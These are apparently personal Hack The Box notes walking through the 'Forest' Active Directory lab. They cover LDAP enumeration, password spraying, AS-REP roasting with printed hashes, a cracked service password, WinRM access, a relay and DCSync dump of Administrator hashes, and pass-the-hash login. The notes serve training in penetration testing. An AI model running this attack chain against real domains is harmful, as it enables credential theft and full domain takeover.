HTB Forest
Hack the box notes
LDAP 389/TCP - ldapsearch
LDAP normally provides verbose information about the AD. And if anonymous bind is allowed, we can query many of good AD information, such as user information.
Anonymous (NULL) Bind
# ldapsearch null bind
(-x ) simple (anonymous) authentication, otherwise MD5
(-s ) scope
(-b ) basedn .. base domain name
ldapsearch -H ldap://10.129.95.210 -x -s base
ldapsearch -H ldap://10.129.95.210:389 -x -b "dc=htb,dc=local"
# Account policy
[+] Password Info for Domain: HTB
[+] Minimum password length: 7
[+] Account Lockout Threshold: None
# Accounts enumeration
ldapsearch -H ldap://10.129.95.210:389 -x -b DC=htb,DC=local "(objectClass=person)" | grep "sAMAccountName:"
...
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
Remote Management Users
ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"
Windapsearch
# install
git clone https://github.com/ropnop/windapsearch
apt-get install libsasl
pip install ldap
pip install python-ldap
python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 -U
[+] No username provided. Will try anonymous bind.
[+] Using Domain Controller at: 10.129.95.210
[+] Getting defaultNamingContext from Root DSE
[+] Found: DC=htb,DC=local
[+] Attempting bind
[+] ...success! Binded as:
[+] None
[+] Enumerating all AD users
[+] Found 28 users:
python3 windapsearch.py -d htb.local --dc-ip 10.129.95.210 --custom "objectClass=*"
Kerberos - 88/TCP
kerbrute
Brute force and enumerate valid AAD accounts with kerbrute
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
./kerbrute_linux_amd64 passwordspray -d htb.local --dc 10.129.95.210 ./user.txt 'pass' -v
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 06/06/23 - Ronnie Flathers @ropnop
2023/06/06 14:15:55 > Using KDC(s):
2023/06/06 14:15:55 > 10.129.95.210:88
2023/06/06 14:15:55 > [!] svc-alfresco@htb.local:pass - Got AS-REP (no pre-auth) but couldn't decrypt - bad password
2023/06/06 14:15:55 > [!] lucinda@htb.local:pass - Invalid password
2023/06/06 14:15:55 > [!] mark@htb.local:pass - Invalid password
2023/06/06 14:15:55 > [!] andy@htb.local:pass - Invalid password
2023/06/06 14:15:55 > [!] santi@htb.local:pass - Invalid password
2023/06/06 14:15:55 > [!] sebastien@htb.local:pass - Invalid password
2023/06/06 14:15:55 > Done! Tested 6 logins (0 successes) in 0.324 seconds
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64
Kerberoasting
Identify Kerboros Service Principal Names (SPN) tight to the account using Impacket's GetSPN
# list SPNs tight to account
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName>
# ticket to crack
impacket-GetUserSPNs -dc-ip <IP> <Domain/accountName> --request
the response contains kerberos hash which can be cracked offlien with hashcat or john
impacket-GetNPUsers htb.local/svc-alfresco -no-pass -dc-ip 10.129.95.210
# store it into file: svc_hash
$krb5asrep$23$svc-alfresco@HTB.LOCAL:ffe734482ed68633483d56361f5fb53e$1e56eced31d90377e3ed00ad0ee02238daa7a06be902100b62ceb6134143c991ab99f42f276fd1d8d5aca0c8e0eeed4bac11b3b2dbc2a2575f5dd73dc9d3c9e25c1371ef7b36a0d3356303ea7b99c1e45d4ff17b25c821a302cc03db11db9a7e1a434a6a676785867472c9f02e8206e275f06e93fba7060bb5d1577d796748518cac9ffad084f8b7ef852f3b18db2b4cd231e1ec3e6a8ea8934842bedb379f5d04a72984c53a18716cddf4c2529d493dfb552d9ae47d99ec0cac30c692de42450eb2ae9ed08688f198f8edddf0ababfdd57dafc40ed02c69361219f294fc039082ccfc1e94a1
Hashcat - Cracking Kerberos ticket
hashcat -m 13100 -a 0 svc_hash passwordlist.txt --force --show
Johne The Ripper - Cracking Kerberos ticket
john --wordlist=/usr/share/wordlists/rockyou.txt ./svc_hash
Crackmapexec - Test login to account
crackmapexec smb 10.129.95.210 -d htb.local -u svc-alfresco -p s3rvice
WinRM
WinRM (5985/TCP) — Microsoft implementation of WS-Management protocol. This can allow a remote connection via PowerShell.
Look for remote management user group
ldapsearch -H ldap://10.129.95.210 -x -b DC=htb,DC=local | grep -A 11 -i "Remote Management Users"
net rpc group members 'Privileged IT Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1
net rpc group members 'Service Accounts' -W 'htb.local' -I '10.129.95.210' -U'svc-alfresco'%'s3rvice' 2>&1
Evil-WinRM
git clone https://github.com/Hackplayers/evil-winrm
ruby evil-winrm.rb -i 10.129.95.210 -u svc-alfresco -p s3rvice
net group /domain
Abusing privileges of "Account Operators" see bellow in BloodHound inspection we continue with the privilege escalation by adding new user using DSYNC attack.
DSYNC Attack thhrough - Exchange Trusted Subsystem group
Create domain account
PS C:\> net user bigb0ss bigb0ss /add /domain
PS C:\> net group "Exchange Trusted Subsystem" bigb0ss /add /domain
PS C:\> net user bigb0ss /domain
Impacket NTLM Relay
Impacket’s ntlmrelayx.py performs NTLM Relay Attacks, creating an SMB and HTTP server and relaying credentials to various different protocols (SMB, HTTP, LDAP, etc.).
# kali terminal1
cd /usr/share/doc/python3-impacket/examples/
./ntlmrelayx.py -t ldap://10.129.95.210 --escalate-user bigb0ss
DSYNC attack - Dump Administrator LM/NT hash
# kali terminal2
secretsdump.py htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
# kali terminal2
impacket-secretsdump htb.local/bigb0ss:bigb0ss@10.129.95.210 -just-dc-user administrator
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
[*] Kerberos keys grabbed
htb.local\Administrator:aes256-cts-hmac-sha1-96:910e4c922b7516d4a27f05b5ae6a147578564284fff8461a02298ac9263bc913
htb.local\Administrator:aes128-cts-hmac-sha1-96:b5880b186249a067a5f6b814a23ed375
htb.local\Administrator:des-cbc-md5:c1e049c71f57343b
[*] Cleaning up...
PSEXEC - Login as administrator using hash
impact-psexec htb.local/administrator@10.129.95.210 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6
EOF The following BloodHound analysis....
BloodHound Kali - igestor based on impacket
Python based igestor based on impackets
pip install impacter
pip install ldap3
pip install bloodhound
git clone https://github.com/fox-it/BloodHound.py.git
./bloodhound.py -u svc-alfresco -p s3rvice -d htb.local -ns 10.129.95.210
BloodHound and Neo4j
Initial setup
apt install bloodhound
apt install neo4j
neo4j console
Start neo4j console and visit first http://localhost:7474 password wizard
Start
./BloodHound --no-sandbox
Import data (upload icon)
Set alfresco as owned
Click on alfresco and chose "Unrolled membership"
We can see the user is part of "Account Operators" group. Members of this group can create and modify most types of accounts.
Go back to DSYNC attack.
Last updated
Was this helpful?